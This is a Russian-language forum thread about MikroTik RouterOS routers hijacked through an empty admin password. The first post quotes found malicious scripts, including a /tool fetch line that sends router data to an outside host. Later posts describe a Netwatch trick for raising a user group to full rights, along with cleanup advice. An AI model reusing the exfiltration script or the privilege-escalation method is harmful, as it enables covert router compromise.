+7 495 320-55-52
- Назад
- Телефоны
- +7 495 320-55-52
- Заказать звонок
info@mikrotik.moscow
г. Москва, ул. Бакунинская, 84
Пн-Пт: 09-00 до 18-00
Сб-Вс: выходной

Возможное нарушение безопасности

Возможное нарушение безопасности, RouterOS

JacquesL

Guest

04.03.2017 09:33:00

Я обнаружил два подозрительных скрипта на своем роутере Mikrotik после установки версии 6.39rc41. Скрипты принадлежали администратору (конечно же, были отключены).

Первый собирает список файлов:
ptty-r :delay 100s
/file print file=rmip.txt
/file set rmip.txt contents="yes"
/system script run ptty

Второй отправляет данные на веб-страницу:
ptty :delay 100s
:global myip [/file get mip.txt contents]
:global rmyip [/file get rmip.txt contents]
:global ctryip [/file get ctryip.txt contents]
/tool fetch url="http://createpage.myserv.ignorelist.com/.../metaR-srv.php?ip=$myip&reboot=$rmyip&ctry=$ctryip" mode=http keep-result=no

Есть какие-то рекомендации? Вы уже с таким сталкивались? Может, стоит провести какие-то дополнительные проверки, чтобы понять, что именно было изменено? Спасибо!

dudleyrees

Guest

15.02.2018 23:34:00

Спасибо, Jabberd, за твою строчку Netwatch — она позволила мне, как администратору, заставить мой роутер работать с New Terminal и SSH логином, с которых меня выбросило. Я всего пару минут оставил роутер с пустым паролем на WAN, и его сразу взломали — поражён, как быстро это произошло.

jabberd Guest	#3 0 21.03.2017 23:10:00 Я раньше видел такое на некоторых устройствах: там был пользователь «router» с полными правами (пароль неизвестен), а также «admin» с только что созданной группой «admin» с ограниченными привилегиями.

Van9018

Guest

22.03.2017 01:57:00

Также проверьте файрвол, у вас должна быть правило по умолчанию «запретить» для входящих соединений на WAN. Подумайте о том, чтобы не разрешать доступ к админке роутера из WAN. Не оставляйте стандартный пароль администратора пустым, вредоносные программы внутри сети могут войти в роутер и настроить всё, что захотят.

jabberd

Guest

22.03.2017 11:39:00

Если у вас есть пользователь «router» с полными правами, а у пользователя «admin» установлена группа «admin» с ограниченным набором привилегий (ssh, telnet, policy отключены), вы можете попробовать войти под admin и добавить правило netwatch up для 127.0.0.1 с помощью чего-то вроде этого: /user set admin group=full Тогда не будет необходимости сбрасывать настройки.

raffav

Guest

20.02.2018 03:51:00

Привет! Но если посмотреть с другой стороны, этот трюк с netwach — своего рода эксплойт. Если у какого-то техника есть ограниченные права в группе, к которой он принадлежит, он может повысить уровень доступа группы до полного. Отправлено с моего XT1580 с помощью Tapatalk

normis Guest	#7 0 20.02.2018 07:13:00 Да, мы уже занимаемся этим. С другой стороны, этому человеку всё ещё нужен существующий пользователь с правами «записи».

punkaker

Guest

22.10.2018 08:47:00

Привет! Сегодня мы столкнулись с точно такой же проблемой на роутере с версией 6.43.2 (но на нем не было правил файрвола в течение часа). Ты знаешь, можно ли ещё как-то использовать «фишку netwatch», чтобы восстановить права администратора? Мы можем войти как admin, но есть пользователь “router” с полными правами, и мы не знаем его пароль. Роутер находится в удалённом месте, так что ехать туда, чтобы это исправить, было бы большой проблемой. Спасибо!

JJT211

Guest

28.07.2019 17:52:00

Старое обсуждение, знаю, но думаю, стоит поднять. Со мной случилось то же самое. В моём расписании было 2 скучных скрипта. Мой роутер был около нескольких минут открыт в WAN с дефолтным именем пользователя, но я заметил скрипт только через несколько дней. Удалил скрипты, администратора, нового пользователя роутера, которого создали, и поменял пароль. Будьте осторожны. Спасибо за пост.

mkx

Guest

#10

29.07.2019 14:35:00

Как уже обсуждалось в других темах, самое безопасное, что можно сделать, если заметил, что роутер был взломан, — это экспортировать конфигурацию (ASCII-часть с помощью команды /export), проверить конфиг на наличие чего-то подозрительного, затем сделать netinstall роутера (это единственный способ, который действительно всё полностью очищает), начать с заводских настроек (у SOHO роутеров довольно разумные настройки фильтрации по умолчанию) и менять только то, что явно необходимо.

JJT211

Guest

#11

30.07.2019 03:16:00

Ок, спасибо за предупреждение. После того как я это опубликовал, заметил ещё несколько скриптов и разных штук в моём роутере, которые пришлось удалить. Поскольку этот Mikrotik используется как DMZ между интернетом и моим фаерволом, я думал, что всё нормально и можно не заморачиваться с перенастройкой. Но, думаю, ты прав — всё же стоит сделать полную очистку. Ещё раз спасибо!

jabberd Guest	#12 0 24.02.2018 07:22:00 Ладно, мне следовало пожаловаться в поддержку на эту «функцию». Я думал, что достаточно упомянуть об этом здесь, чтобы всё исправили.

Читают тему

Главная Каталог 0 Корзина 0 Избранные Кабинет 0 Сравнение Акции Контакты Услуги Бренды Отзывы Компания Лицензии Документы Реквизиты Поиск Блог Обзоры